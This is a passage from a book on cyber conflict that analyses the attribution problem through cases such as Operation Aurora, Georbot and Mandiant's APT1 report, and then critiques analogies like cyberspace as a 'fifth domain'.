at the time, but are relatively easy to exploit. 24 Gaining clandestine 
access to a company’s source code is the holy grail of cyber attacks: it 
would give the intruder the power not just to pilfer proprietary pro¬ 
gramming code, but to make changes to the source code, for instance to 
install a secret peephole that would be passed on to trusting customers 
of Google or Adobe products. Aurora had the look and feel of a sophis¬ 
ticated bank shot across Mountain View to pocket dissidents at home. 
Yet the attack could also have an economic motivation. 

Its sophistication and the suspected mixed motivation made the 
attack highly unusual. The attacker’s motivation for the intrusion into 
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the systems of the Californian search giant seemed to combine interna¬ 
tional economic espionage as well as domestic political surveillance of 
activists. That pattern was not limited to one target, Google. What 
became known as Operation Aurora targeted at least thirty-four leading 
US companies from various sectors, among them Yahoo!, Symantec, 
Adobe, Northrop Grumman, and Dow Chemical. 25 (There are not that 
many Chinese dissidents who happen to have email accounts with 
Northrop Grumman or Dow Chemical, it should be noted.) Aurora, 
unusually, was a multi-purpose attack. It exploited a previously unknown 
vulnerability in Microsoft’s Internet Explorer. Once inside an organiza¬ 
tion, the attackers used another clever technique, called man-in-the- 
mailbox—a pun on man-in-the-middle attacks—where an attacker 
would send emails that allegedly came from trusted colleagues, thus 
tricking others into opening attachments. 

Attempts to attribute Operation Aurora yielded unexpectedly detailed 
results. The National Security Agency participated in a detailed investi¬ 
gation. The origin of the attack was traced to two Chinese schools that 
train computer scientists. One was Shanghai Jiaotong University, which 
runs one of Chinas top computer science programs. Students at Jiao¬ 
tong had recently won a well-known computer science competition, the 
so-called Battle of the Brains, sponsored by IBM since 1997, surpassing 
103 of the world’s top universities, including US institutions such as 
Stanford University. The New York Times interviewed academics on Jiao- 
tong’s faculty. “I’m not surprised. Actually students hacking into foreign 
Web sites is quite normal,” one professor said anonymously (ironically 
he also didn’t want to be attributed for fear of reprisal from the school). 
He then offered two scenarios: 

I believe there’s two kinds of situations. One is it’s a completely individual 
act of wrongdoing, done by one or two geek students in the school who are 
just keen on experimenting with their hacking skills learned from the 
school, since the sources in the school and network are so limited. Or it 
could be that one of the university’s IP addresses was hijacked by others, 
which frequently happens. 26 

The other school was Lanxiang Vocational School in East China, 
which was established with military support. The head of Lanxiang’s 
computer science department doubted the school’s involvement, and 
argued, plausibly, that the Aurora attacks were too sophisticated for 
Lanxiang’s students: 
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I think it’s impossible for our students to hack Google or other US com¬ 
panies because they are just high school graduates and not at an advanced 
level. Also, because our school adopts close management, outsiders cannot 
easily come into our school. 27 

Even five weeks after Google made the attack public, the Times, and 
much of the world, could only guess and assume that Aurora had been 
a Chinese state-sponsored attack. Most likely the attack had only been 
routed through the schools’ servers, which are often badly protected, in 
order to deflect attention from the actual attacker. Behind closed doors 
however, the US government already had more information about the 
attack, just ten days after the story broke. On 22 January, a political 
officer in the US embassy had a confidential conversation with Chen 
Jieren, the editor of a Communist Youth League website. That editor 
was also the nephew of He Guoqiang, a Politburo Standing Committee 
member and thus a senior and well-placed government official. Chen 
revealed that the attack was coordinated by the State Council Informa¬ 
tion Office and overseen by two other Politburo members, Li Chang¬ 
chun and Zhou Yongkang. 28 Information about the attack appeared to 
be closely held by them, and only after Google made the announcement 
on its blog was the operation discussed more widely in the party It 
therefore remained unclear if Chinas president, Hu Jintao, as well as 
Prime Minister Wen Jiabao, had been aware of the attack against 
Google. What also remained vague was the attack’s motivation. Chen 
insisted that the operation was “one hundred percent” political and 
designed exclusively to spy on Chinese dissidents. But the former CEO 
of Google China told the US embassy that Li Changchun, one of the 
attack’s masterminds, was actively supporting the country’s main search 
company Baidu against Google, its biggest competitor. Verisign, a lea¬ 
ding Internet security company that also runs two of the web’s thirteen 
root servers, has detailed knowledge of China’s online activities. In an 
unpublished 2011 report, Verisign considered it “probable” that “state 
agencies” from the People’s Republic of China were behind Aurora. 
Operation Aurora, it should be noted, is one of the best-attributed poli¬ 
tical cyber attacks on record—and the group behind Aurora has been 
continuing its operations for years, mostly against targets in the defense, 
shipping, aeronautics, and energy sectors, but also against NGOs and 
human rights organizations. No other hacking group has used more 
zero-day exploits than this group, dubbed the “Elderwood Project” by 
Symantec, approximately eight between 2009 and 2012. 29 
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A third example offers a Tom Clancy-style story of solving the attri¬ 
bution problem: active defense, which in this case meant hacking back. 
The case is known as “Georbot.” Georbot began unfolding in Georgia 
in early 2011. The country’s troublesome relationship with Russia had 
expressed itself in military confrontations as well as in hacking attacks 
before, most recently in 2008. Then, nearly three years later in March 
2011, a suspicious file on the computer of a government official came 
to the attention of the Georgian CERT. “Dr. WEB,” a Russian anti-virus 
scanner, had flagged up the allegedly corrupted file. Georgian computer 
experts soon discovered that unknown hackers had infected between 
300 and 400 computers across six government agencies. The machines 
formed a Georgia-focused botnet, hence the case’s nickname. The intru¬ 
ders were obviously looking for political information: the malware was 
primed to search for obvious keywords in Microsoft Word and PDF 
documents, almost in a naive way, for instance for “USA,” “Russia,” 
“NATO,” or “CIA.” 30 When a document met the search criteria, it was 
copied to command-and-control servers from which the attackers 
would move the document to their own computers, and then delete the 
dropped file on the interim server. The intrusion evolved over time and 
the attackers added functionalities. They were able to clandestinely exfil¬ 
trate screenshots and recorded audio material—but for once the trick 
backfired. The case took an odd turn when the Georgian government 
cut off the command-and-control servers. The hackers didn’t stop, but 
changed their methods. They knew they had been discovered, so they 
presumably decided to increase the stealthiness of their spying opera¬ 
tion. The attackers did so by using a PDF vulnerability that was not 
publicly known at the time. 31 As usual, the intruders would trick unsus¬ 
pecting users into opening a compromised email attachment to pene¬ 
trate a network. But the address they used, admin@president.gov.ge, 
was suspicious. When the Georgian CERT started digging into the 
details, the found circumstantial information that possibly implicated 
Russian intelligence agencies. The spam service that was used to send 
the fake emails, legalcrf.in, lead to a name, cover company, and street 
address in Moscow: Artur Jafuniaev, WSDomains, Lubianka 13, 346713 
Moscow—the street address of the Russian Ministry of Internal Affairs, 
which is next to the Federal Security Service of the Russian Federation, 
FSB. The Georgians decided to take action and set up a honeypot, not 
just for research purposes, but to hack back. The Georgian experts offe- 


151 


CYBER WAR WILL NOT TAKE PLACE 


red the attacker an appropriately named target document that was itself 
infected. The CERT’s highly technical report described the operation in 
broken English: 

We have Infected our PC from Lab, then gave Cyber Attacker Fake 

ZIP Archive with his own virus inside and the name “Georgian-Nato 

Agreement.” 32 

The Russian hackers indeed stole the fake Georgian-Nato Agreement, 
opened it, and unknowingly executed the document’s embedded pay- 
load. This allowed the Georgians to maintain control of the hacker’s PC 
for at least ten minutes. That was enough time for the Georgian govern¬ 
ment team to dig into their victim’s computer. They were able to obtain 
one document, written in Russian, that detailed further plans to attack 
more targets. Most remarkably, though, the Georgian CERT managed to 
switch on the hacker’s own webcam and film a short video of him: “We 
had maintained control over his PC,” the official report stated in raw 
English, “then captured got video of him, personally. We have captured 
process of creating new malicious modules.” Their target presumably 
noticed the ruse after a short while and switched off access. But it was too 
late. The Georgian government’s official report, highly unusually, contai¬ 
ned two photos of the unknown Russian hacker. It shows a skinny, mus¬ 
tachioed man with dark hair, perhaps in his 30s, hunched over the screen, 
typing, while sitting in a neon-lit residential apartment with a trashy 
interior design. Yet his name and affiliation ultimately remained unclear: 
the Georgian CERT could hardly count on the on-the-ground support 
of Moscow law enforcement authorities to verify their suspicions. 

The Georbot incident is probably the only detailed example of a suc¬ 
cessful case of active attribution on the public domain. But perhaps its 
most unusual feature is the fact that the Georgian government made the 
information public. Most intelligence agencies and their governments 
are highly reluctant to publicize such operations, for that could reveal 
vulnerabilities, tactics, skills, and create potential political blowback. Yet, 
if a small and technologically limited agency like Georgia’s Ministry of 
Justice can pull of an active attribution operation in a legally grey area, 
then the assumption is reasonable that mighty and highly specialized 
intelligence agencies of the world’s most technologically sophisticated 
powers can achieve a much higher degree of attribution. But by no 
means does this mean that Leon Panetta’s cocky general statement about 
solving the attribution problem can be taken at face value. 
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One crucial limitation of attribution comes to the fore if intelligence 
is distinguished from the narrower concept of evidence. In criminal 
justice as well as in some scientific disciplines, the standards of evidence 
are clearly defined. In the legal systems of the United Kingdom as well 
as the United States, the highest threshold of proof is “beyond reaso¬ 
nable doubt,” a long-used term in criminal justice. Proof is beyond 
reasonable doubt if the available evidence (or the absence thereof) logi¬ 
cally implies the incriminating facts, based on reason and common 
sense. This criterion must be met in any criminal trial if the defendant 
is to be pronounced guilty—if it is not met, the judge or jury will acquit 
the defendant. Lower standards of proof are possible in civil litigation, 
for instance “preponderance of the evidence,” which means that one side 
has more evidence in its favor than the other side. In intelligence collec¬ 
tion and analysis, the standards of proof are less clearly defined—and 
they are necessarily lower than “beyond reasonable doubt.” Most intel¬ 
ligence collection takes place in hostile and less permissive environments 
than the hands-on, on-the-ground collection of forensic evidence on a 
crime scene, particularly in the case of intelligence on ongoing computer 
breaches. It is therefore unrealistic and unreasonable to hold intelligence 
to the same standards of proof as the evidence produced in criminal 
trials. The following story vividly illustrates this problem. 

In 2004 Jack Wang was an ambitious young man in his early 20s with 
a keen interest in military affairs and a notable nascent skill in hacking. 
He was also a Chinese patriot. On 16 January that year, Wang attended 
an online question-and-answer session hosted by the PLA Daily’s China 
Military Online, at chinamil.com.cn. The forum offers its users the 
option of a profile picture. Wang chose a glossy picture of air force-style 
insignia that depict a golden star adorned with hammer and sickle sit¬ 
ting on golden eagle wings, with the caption “junior pilot.” The guest 
on the forum was Zhang Zhaozhong, a military theorist and now retired 
rear admiral. That Friday he took part in a hosted event, “Outlook 
2004,” to discuss China’s international strategic situation. At the time 
Zhang was a professor at the PLA’s National Defense University in Bei¬ 
jing. One of his books, Network Warfare, was popular among students. 
Casually seated in a civilian black turtleneck in front of a large screen, 
Zhang responded to the questions that were coming in from his online 
audience. Jack Wang, the would-be pilot, was logged in as UglyGorilla. 
He asked a rather prescient question: 
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Professor Zhang, I read your book Network Warfare and was deeply 
impressed by the views and arguments in the book. It is said that the US 
military has set up a dedicated network force referred to as a “cyber army.” 
Does China have a similar force? Does China have cyber troops? 33 

Wang soon had the answer. That same year, it turned out, he would 
join the growing ranks of China’s cyber troops by becoming a member 
of PLA Unit 61398, henceforth using that same pseudonym in many of 
his hacking sprees. The infamous unit was part of the PLA’s cyber com¬ 
mand, situated in the General Staff Department (GSD), specifically the 
3rd Department, 2nd Bureau, which operates under the Military Unit 
Cover Designator 61398. Just ten months after his online Q&A session 
with the professor, on 23 October, Wang registered hugesoft.org, a URL 
that over the next nine years would continuously be used to facilitate 
sophisticated computer spying operations against western and especially 
American targets. Wang was one of hundreds if not thousands of mili¬ 
tary spies busily pilfering secrets from abroad. He often signed his work 
with a clearly notable autograph in the code, in the self-assured style of 
an artist signing his painting: “vl.O No Doubt to Hack You, Writed by 
UglyGorilla, 06/29/2007 [sic].” 34 

By 2007, Unit 61398 had grown so much that the PLA constructed 
a large but nondescript twelve-story office building off Datong Road, in 
Gaoqiaozhen, in Shanghai’s Pudong New Area. Pudong on its own is a 
sprawling metropolis of 5 million, twice the population and twice the 
area of Chicago, with a world-famous skyline. Over a period of seven 
years, Jack Wang’s group worked on brazen intrusions against at least 
141 organizations in twenty different industries, including the Coca- 
Cola hack mentioned earlier. On average, the Chinese army hackers 
maintained access to their victims’ computer networks for almost one 
year at a time, 356 days to be precise. The longest breach continued for 
four years and ten months. Unit 61398 drained gigantic amounts of 
data from its victims, in the case of one unidentified organization 6.5 
terabytes over a ten-month period. The group used at least 937 com- 
mand-and-control servers that were hosted on 849 distinct IP addresses, 
with the majority registered in China. When Wang’s group attacked a 
target, they almost never connected directly from Shanghai but instead 
“hopped” through various nodes to cover their traces. The unit’s vast and 
growing espionage campaign created its own administrative and logisti¬ 
cal challenges. In 2009, China Telecom even had to provide a dedicated 
high-speed fiber-optic line to the new building. 
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This remarkably detailed story is based on intelligence, not evidence 
that would meet the beyond-reasonable-doubt test. Most of these details 
were revealed in a seventy-four-page report, simply titled APTl, 
published on 19 February 2013 by Mandiant, an American security firm 
that has investigated hundreds of security breaches at organizations 
worldwide. The study is the most significant, publicly available document 
that attributes major espionage operations to a Chinese entity. Man¬ 
diant s path-breaking report focused on one specific group, APTl, shor¬ 
thand for Advanced Persistent Threat 1, alternatively known as Comment 
Crew or Comment Group. The report—and Jack Wang’s story as 
recounted here—made several major links that were based on estimations 
of various degrees of certainty. The first link was that it bundled 141 
attacks and attributed them to APTl. This connection could reasonably 
be made with a high degree of certainty on the basis of digital forensic 
evidence, for instance the attack methodology, the type of software used, 
or specific tools and techniques that have not been used by others. 

A second link concerned the mission of Unit 61398. The difference 
between passive intelligence gathering and active computer network 
attack is subtle but important. The source that Mandiant cited in its 
report merely estimated that Unit 61398 is in the business of intelligence 
gathering, not necessarily computer network attack. 35 Consequently, the 
fact that China Telecom upgraded the unit’s fiber-optic infrastructure 
does not inevitably imply that it was used to support a larger volume of 
high-profile attacks. The installation could merely reflect that the com¬ 
pany is a legitimate contractor for the PLA, and possibly that the new 
data link was used for passive intelligence gathering, either of domestic 
or international nature. 

But the report’s most explosive claim rested on a third link: that 
APTl is PLA Unit 61398. The proof for this third link is far more diffi¬ 
cult. It relied on circumstantial evidence. The first piece of intelligence 
was that one of the “personas” that the report described, similar to the 
story of UglyGorilla above, identified himself as a local of Shanghai’s 
Pudong New Area. The second piece of intelligence was that the IP 
addresses used by APTl originated partly in Pudong, “Although they 
control systems in dozens of countries, their attacks originate from four 
large networks in Shanghai—two of which are allocated directly to the 
Pudong New Area,” the report found. Unit 61398 is also in Pudong. 
Therefore, Mandiant’s computer security specialists concluded, the two 
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were identical, “Given the mission, resourcing, and location of PLA 
Unit 61398, we conclude that PLA Unit 61398 is APTl.” 36 But conspi¬ 
cuously the report did not mention that Pudong is not a small neighbo¬ 
rhood (“right outside of Unit 61398’s gates”) 37 but in fact a vast city 
landscape twice the size of Chicago. 38 

The lack of caution and nuance in the report’s black-and-white 
conclusion unfortunately undermined its credibility more than it bolste¬ 
red its important case. Since at least the 1960s intelligence analysts were 
conscious of their estimative language. Major intelligence failures in the 
wake of the Iraq invasion of 2003 have made the intelligence communi¬ 
ties in the UK and the US far more cautious in their assessments and 
more nuanced in their language used to convey the quality and certainty 
of the available intelligence to their political masters. 39 In the intelligence 
profession, this communication problem has long been known as Words 
of Estimative Probability. 40 Computer security companies should heed 
the spies’ insights. Nevertheless the Mandiant study cannot be dismissed 
out of hand, as the Chinese government tried to in its official response. 
The standards of proof that can be achieved in an intelligence operation 
without human sources on the ground, let along without support by 
local law enforcement agencies, are bound to be lower than ideal—but 
estimates that are “probable” or “almost certain,” to use two of the 
highest gradations of intelligence, may still be sufficient to take meanin¬ 
gful political action, even action with serious consequences. 

The brief consideration of four rather different yet highly instructive 
cases—Burleson, Aurora, Georbot, and the Mandiant report allows two 
important generalizations: one is that the attribution problem is almost 
never perfectly solved—attributing identity without an agent claiming 
credit or confessing nearly always entails a call of judgment. That is the 
case even in a highly simplified scenario like the Burleson incident and 
the subsequent trial. It is also the case in a complex and international 
high-stakes attack like Operation Aurora. Another generalization: to 
achieve even imperfect attribution, supplemental non-technical evi¬ 
dence, or at least intelligence, is required. And that evidence has to come 
from human sources or witnesses. In the context of a state-sponsored 
attack, one added difficulty arises in identifying the agency and the level 
of leadership that ultimately has the responsibility for an operation. 
Again a short comparison with conventional military operations is instruc¬ 
tive. In the case of the conventional use of force, both the responsible 
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agencies and the levels of authorization are historically well established, 
although in specific cases there may be significant uncertainty. For cyber 
attacks, the situation is again reversed. Uncertainty and a lack of orien¬ 
tation are the norm, not the exception. 

Yet it is crucial to note that these four relatively well-documented 
cases are the exception, not the rule. In the majority of cases of cyber 
espionage, the attribution problem has the unpleasant effect that even 
the most fundamental insights remain clouded in mystery, including the 
specific motivation of the attack. Two short examples illustrate this 
shortfall. The first example is a series of attacks uncovered about a year 
after Aurora, in February 2011. In an operation that became known as 
as “Night Dragon,” unknown intruders attacked a number of global 
energy and petrochemical companies along with individuals and 
business executives in Kazakhstan, Taiwan, Greece, and the United 
States. 41 When it was discovered, the attack had already been underway 
for more than a year, since November 2009. The intruders started this 
hack by going after the companies’ external web servers, using attack 
tools such as SQL-injection or remote administration tools that were 
readily available on illicit forums online, for instance on http://rootkit. 
net.cn. Once inside, the online spies used a variety of techniques to hop 
from machine to machine on a company’s internal network. The intru¬ 
sions appeared to have been staged by a small group of attackers, perhaps 
of a dozen or fewer people. The records show that the attack took place 
during regular office hours, between 9 a.m. and 5 p.m. Beijing time 
during the workweek, indicating that it was the work of professionals, 
not hackers. “These were company worker bees, not freestyle hackers,” 
said Dmitri Alperovitch, then at McAfee. 42 Yet such details are not evi¬ 
dence—at best, they are shoddy intelligence. Stewart Baker, a former 
assistant secretary at the Department of Homeland Security, pointed out 
how difficult it is to draw clear conclusions. The intrusion of oil and gas 
companies, he said, “could well be [the] Chinese government, but I can’t 
say the government would even have to be aware of it.” Baker then 
speculated that the intruders’ motivation may well have been economi¬ 
cal, not political. “The most valuable intelligence in the commercial 
world may be what oil exploration companies have found and not 
found,” he told the Financial Times , 43 McAfee, who broke the news on 
the attack, was appropriately careful to warn that attribution was diffi¬ 
cult: “ Important-. McAfee has no direct evidence to name the originators 
of these attacks but rather has provided circumstantial evidence.” 44 
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A second example happened about a year later. In May 2012, an 
attempted attack on American natural gas pipelines was discovered. The 
Department of Homeland Security, in charge of protecting the country’s 
critical infrastructure, made it publicly known that the attacks were 
ongoing. The department’s Industrial Control Systems Cyber Emer¬ 
gency Response Team said that its experts had identified a live campaign 
of intrusions. The ICS-CERT, as the response team is known, had 
contacted natural gas and oil pipeline operators in order to help them 
recognize the attacks. Attackers had used a tried and tested method to 
trick employees at those companies into opening infected attachments 
or clicking on infected links. In quite sophisticated spear-phishing 
attacks, the attackers had managed to send fake emails purportedly from 
colleagues. The attacks did not target the actual control systems, and did 
not cause any damage to the pipelines. Yet the wider purpose of the 
attacks remained unclear. The operators voiced their concern through an 
industry group. “These intrusions are reconnaissance,” said Cathy Lan¬ 
dry from the Interstate Natural Gas Association of America, “But we 
don’t know if they are trying to get into the pipeline control system, or 
into company information.” 45 

To appreciate the true significance of the attribution problem, the 
other perspective has to be considered in turn. The other perspective is 
the perspective of the attacker. The targeted party nearly always has an 
interest in attributing violent action to its agent—but the situation is 
more complex for the offender. An offensive actor may have one of four 
interests in attributing a cyber attack: avoiding attribution; message 
attribution; full attribution; or false attribution. The four will be briefly 
considered in turn. 

The first and often very likely scenario is that an attacker attempts to 
avoid attribution-, in the vast majority of cases of cyber espionage, spies 
simply want to avoid all attribution. All cases discussed above under 
espionage have this trait in common. Avoiding attribution is also likely 
to be in the interest of professional saboteurs, where the act of sabotage 
itself—Stuxnet is the prime example—carries its own implicit message 
that does not need to be explicitly explained to the target. 

This may be different in the second scenario, message attribution. If an 
attacker or a group of attackers wants to use a cyber attack, for instance 
a Denial of Service Attack, as a vehicle to make a political statement, 
then this statement almost always requires some sort of explanation. 
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Military as well as militant action, generally speaking, requires an expla¬ 
nation. The perpetrators of a terrorist bombing, for instance, usually 
follow up with a communique that explains the rationale of the offense. 
Something similar applies in the case of some cyber attacks. The Sha- 
moon incident, the hacking attack against Saudi Aramco on 15 August 
2012, illustrates the messaging requirement. A new entity, The Cutting 
Sword of Justice, successfully claimed credit for the attack. On the same 
day that the attack became public, a user by the default name of “A 
Guest” published a communique by simply posting it to Pastebin, an 
Internet platform used to publicize text anonymously by copying-and- 
pasting it there. The message contained information that had not been 
in the public domain at this point in time: the number of compromised 
computers as well as the precise kill time of the malware. Both were later 
confirmed separately by Saudi Aramco and Symantec. These confirmed 
facts in turn established the credibility of the anonymously posted com¬ 
munique, thus attaching a political message to the mysterious attack. 
The attackers, in other words, succeeded in four ways: infiltrating the 
target, engaging the target, attaching a message to the attack, and at the 
same time remaining anonymous. The attackers thus divorced the main 
cost of attribution from the main benefit: suffering consequences as a 
result of making an identifiable political statement. 

The third and perhaps the most interesting scenario is correct attribu¬ 
tion. The attribution problem has a flipside for potential authors of 
offensive malware. Equipping an attack with an anonymous message is 
easy, but it may not be in the interest of the attacker if the stakes are 
high. An act of war, including a potential although unlikely act of cyber 
war, is an act of physical force to compel an actor to change their beha¬ 
vior. The notion that a powerful state actor would try to coerce another 
actor anonymously is highly unrealistic. The exception is covert opera¬ 
tions in a proxy conflict or sabotaging machines in a covert operation of 
a mostly tactical nature. If the political stakes in a one-on-one confron¬ 
tation are high enough, the offender will have an interest in taking credit 
for an attack—or, more likely, the attribution issue will retreat into the 
background in the heat of crisis. 

A fourth scenario is false attribution. Martin Libicki, a cyber security 
analyst at the Rand Corporation in Washington, DC, pointed to the 
problematic incentive structure of cyber attacks that could be designed 
to get one state to “retaliate,” mistakenly, against another state or pos- 
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sibly non-state actor, “the more serious the threat of retaliation, the 
greater the incentive for false-flag operations on the part of the presu¬ 
med attacker’s enemies.” 46 Verisign’s Eli Jellenc described the problem of 
“false-flags” as the mimicry problem and surmised that it could be even 
more serious than the attribution problem conventionally understood. 47 
But deliberate false attribution remains highly speculative. The only 
empirical examples of false attribution are command-and-control servers 
routed through various third countries. An unusual form of false attri¬ 
bution is what may be called a false-credit ruse: falsely claiming a cyber 
attack where none had happened. Perhaps the only example is al-Qaeda’s 
inept and ridiculous claim to have caused the 2003 power blackout, as 
the Egyptian newspaper Dar al Hayat reported. 48 

Several factors are likely to facilitate attribution. Firstly, it is helpful if 
the intruders make mistakes and unknowingly leave forensic evidence 
behind. Mahdi, discussed in an earlier chapter, is an example of a rather 
unprofessional execution. But some professional attackers may maintain 
the highest standards of operational security and not make mistakes. 
Secondly, knowing the motivation of a particular attack may limit the 
number of suspects, especially in political cyber attacks. GhostNet or 
Gauss are examples where the design and the target set of the attack 
point to a limited number of suspects (China and the United States, 
respectively). Thirdly, supporting evidence may be available, such as 
wiretaps or leaks of internal communication that shows a cyber attack 
was planned and authorized by a specific leader or manager, as in the 
Aurora follow-up of the US embassy in Beijing. 49 Fourthly, some attacks 
require a high degree of specialized and hard-to-get intelligence, for 
instance process knowledge about the control system installation in large 
oil refineries. The more specialized, the more expensive, and the more 
hard-to-get the intelligence required for such a strike, the smaller the 
circle of organizations able to acquire that intelligence. Finally, the most 
sophisticated military-grade cyber attacks are likely to be embedded in 
a broader campaign of covert or overt operations, as Stuxnet demonstra¬ 
ted. If cyber attacks merely precede or accompany conventional strikes, 
then the attribution problem steps into the background. 

This analysis leads to a conclusion that is both sobering and comfor¬ 
ting at the same time: the attribution problem is a function of an attack’s 
severity. Attributing political cyber attacks, if executed professionally and 
if unsupported by supplemental intelligence, is very hard if not impos- 
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sible. Even if an attack can be traced to a particular state, and even if 
that state’s motivation to attack seems clear, the attribution problem’s 
technical, social, and political architecture gives the accused state suffi¬ 
cient deniability. The Aurora attack demonstrated such a scenario for the 
Chinese. Stuxnet demonstrated it for the United States and Israel. But 
because the attribution problem is a political problem, there is room for 
maneuver. Both Aurora and Stuxnet were high-profile attacks. But the 
sophistication and the impact of a cyber attack could be significantly 
higher, which leads to an important insight: the more damaging and the 
more violent an attack, the higher the political stakes. And the higher 
the political stakes, the more pressure the targeted country will be able 
to bring to bear on the country of the suspected origin to cooperate in 
a forensic investigation. Consider an Operation Aurora scenario on ste¬ 
roids: a highly sophisticated attack, but one that includes a trailblazing 
campaign of cyber attacks against US critical infrastructure, for instance 
a number of targeted Stuxnet-class intrusions into nuclear power plants 
resulting in damage to the reactors’ cooling mechanisms and possibly 
radioactive incidents that cause casualties and fatalities. Further consider 
that—as with the Aurora attacks—nobody took credit for the attack but 
its destructive design and the high-grade intelligence that enabled it 
limited the number of possible perpetrators; within weeks the NSA 
would be able to trace the origin to Chinese IP addresses at two educa¬ 
tional establishments with links to the military. Such an attack may be 
extraordinarily unlikely, perhaps unfeasible—yet it is helpful to consider 
how a “cyber 9/11” would affect the attribution problem. The political 
situation in the wake of such an event would be extraordinary, and 
military retaliation would be a real option. In such a situation, two 
changes would be likely: first, the standards of attribution would be 
lowered, not to the unreasonable but to the realistic. These standards as 
well as the transparency of the evidence are already lower than in an 
American court trial, perhaps comparable with the far murkier intelli¬ 
gence that regularly supports covert operations and drone strikes in far- 
flung places. The second change would be that the burden of proof 
would shift to the suspect. If Chinese authorities denied their authorship 
without aggressively cooperating with US investigators, providing detai¬ 
led log-files and all available forensic evidence that can lead the investi¬ 
gation a step closer to the perpetrators, either inside or outside China, 
then such a refusal of cooperation may be understood as a tacit admis- 
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sion of authorship; we wont tell you who did it would simply translate 
into we did it. The attribution problem, in short, would most likely be 
resolved within a reasonable time frame in such an extreme situation. If 
cyber war takes place, the attribution problem will likely be solved. This 
is the argument’s comforting part. The sobering part is that this state¬ 
ment can be flipped on its head and turned into a weighty question: if 
cyber war will not take place, can the attribution problem ever be solved? 
The answer, as this chapter argued, entirely depends on the standards of 
proof that policy makers and the public are willing to accept as a suffi¬ 
cient basis for political action. Attribution is always a call of judgment. 
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Before moving on to conclusions, one subject needs to be moved out of 
the way. That subject has permeated this analysis—and it is a subject 
that pervades, if not distorts, many other publications on cyber security: 
analogies. 

Analogies, similes, and metaphors have enabled and shaped the dis¬ 
cussion of computers for many decades. As engineers developed new 
technologies, they needed new words to describe what they and their 
technology were doing. Storage and packets and firewalls are all spatial 
analogies that refer to something humans could intuitively relate to. 
Hard disks were a repository for lots of data, old and new, so referring 
to them as storage devices must have seemed intuitive. Small pieces of 
information, bundled between a header and footer with an address on 
it, naturally could be called a packet. Calling software that prevented 
unauthorized access a firewall just made sense. Pointing out that cybers¬ 
pace itself is a spatial metaphor may be obvious. Less obvious is the fact 
that it was not an engineer who coined the term, but William Gibson, 
a novelist. Gibson first used the word in his 1982 science fiction story 
Burning Chrome} He later popularized it in the 1984 novel Neuroman- 
cer. It is worth quoting the paragraph that introduced the word to the 
book’s readers. The segment describes the fictional thoughts of Henry 
Dorsett Case, a low-level drug dealer in the dystopian underworld of 
Chiba City, Japan: 
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A year here and he [Case] still dreamed of cyberspace hope fading nightly. 

All the speed he took, all the turns he’d taken and the corners he’d cut in 
Night City, and still he’d see the matrix in his sleep, bright lattices of logic 
unfolding across the colorless void ... The Sprawl was a long strange way 
home over the Pacific now, and he was no console man, no cyberspace 
cowboy. Just another hustler, trying to make it through . 2 

Cyberspace, for Gibson, was meant to evoke a digital virtual world of 
computer networks that users would be able to “jack” into through 
consoles. Cyberspace, Gibson later explained, was an “effective buzzword 
... evocative and essentially meaningless.” The writer imagined the word 
as a suggestive term, one that had “no real semantic meaning.” 3 But 
probably not even the resourceful Gibson could have imagined a more 
spectacular rise of his evocative yet meaningless expression. To this day, 
this creative lack of semantic clarity remains a potent source of agility 
that helped the analogy jump out from the pages of an obscure sci-fi 
novel and “jack” cyberspace into the political reality of international 
relations and national security. 

Yet analogies should be used with caution and skill, especially in the 
conceptual minefield that is cyber security. Analogies can be triply ins¬ 
tructive. Lirstly, a metaphor can make it easier to understand a pro¬ 
blem—analogies are didactic devices (saying that cyber security is a 
conceptual minefield, as the opening sentence of this paragraph just did, 
makes one thing obvious: be careful, something can go wrong if you 
don’t pay attention to detail). Secondly the comparisons that metaphors 
force upon us can highlight areas of importance and connections that 
might otherwise have been missed—analogies are inspirational and crea¬ 
tive devices (if cyber security is a conceptual minefield, then perhaps we 
can come up with a way to better find the “mines?”). Finally and most 
importantly at some point a metaphor will begin to fail, and at this 
point of conceptual failure we may learn the most important things 
about the subject at hand, how it differs from the familiar, how it is 
unique—analogies are also testing devices . 4 This triple approach to eva¬ 
luating the utility of metaphors is simple in concept but difficult in 
practice. Perhaps especially in the context of cyber security—a field 
which encompasses the technological knowledge of various subdisci- 
plines of computer science as well as social science, political science, 
legal studies, and even history—each step on this three-bar ladder of 
abstraction by analogy requires progressively more specialized expertise. 
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Taking the first step is easy. Even laypersons may use analogies as didac¬ 
tic devices. Going to the second step is not too difficult. Using analogies 
as creative devices requires some working knowledge of a field but not 
special training. But using analogies as testing devices requires expertise 
and skill. Recognizing a complex analogy’s point of failure and taking 
advantage of the additional insights afforded by the conceptual limita¬ 
tions of a given metaphor takes expert knowledge, perhaps even know¬ 
ledge from across unrelated disciplines and subdisciplines. In practice, 
therefore, analogies often begin to fail without their users noticing the 
defect. The short-sighted and flawed use of metaphors is especially pre¬ 
valent in the cyber security debate, particularly, it seems, among experts 
in military affairs both in uniform and outside uniform. Talking about 
cyber war or cyber weapons, for instance, is didactically useful: the 
audience instantly has an idea of what cyber security could be about; it 
inspires creativity, perhaps evoking thoughts of “flying” or “maneuve¬ 
ring” in cyberspace, not unlike Henry Dorsett Case jacking in. But too 
often analogies are used without understanding or communicating their 
point of failure (if cyber security is a conceptual minefield, then stepping 
on one of the dangerous devices causes harm that cannot instantly be 
recognized). The line between using such comparisons as self-deception 
devices and testing devices, in other words, can be a subtle one. 

A perfect illustration of this problem is the much-vaunted war in the 
ostensible fifth domain. “Warfare has entered the fifth domain: cybers¬ 
pace,” The Economist intoned in July 2010. 5 Indeed, referring to cyber 
conflict as warfare in the fifth domain has become a standard expression 
in the debate. This author was taken aback in a closed-door meeting in 
the Department of War Studies at King’s College London in early 2012 
when a senior lawyer for the International Committee of the Red Cross 
referred to cyber war and wondered whether the ICRC needed to work 
toward adapting the law of armed conflict to that new “fifth domain.” 
Five points will help clear the view. First: the expression of war in the 
fifth domain has its origin as a US Air Force lobbying gimmick. The Air 
Force had already been in charge of air and space, so cyberspace came 
naturally. In December 2005 the US Air Force expanded its mission 
accordingly. That alone is not a strong argument against the term’s uti¬ 
lity, but it should be clear where the expression comes from, and what 
the original intention was: claiming a larger piece of a defense budget 
that would start to shrink at some point in the future. Second: ultima- 


165 


CYBER WAR WILL NOT TAKE PLACE 


tely, code-triggered violence will express itself in the other domains. 
Violence in cyberspace is always indirect, as chapter two discussed at 
length. By definition, violence that actually harms a human being can¬ 
not express itself in a fifth domain. Third, if warfare in the fifth domain, 
as consequently would be necessary, referred only to damaging, stealing, 
or deleting information stored in computer networks, rather than to 
affecting something that is not part of that domain in the first place, 
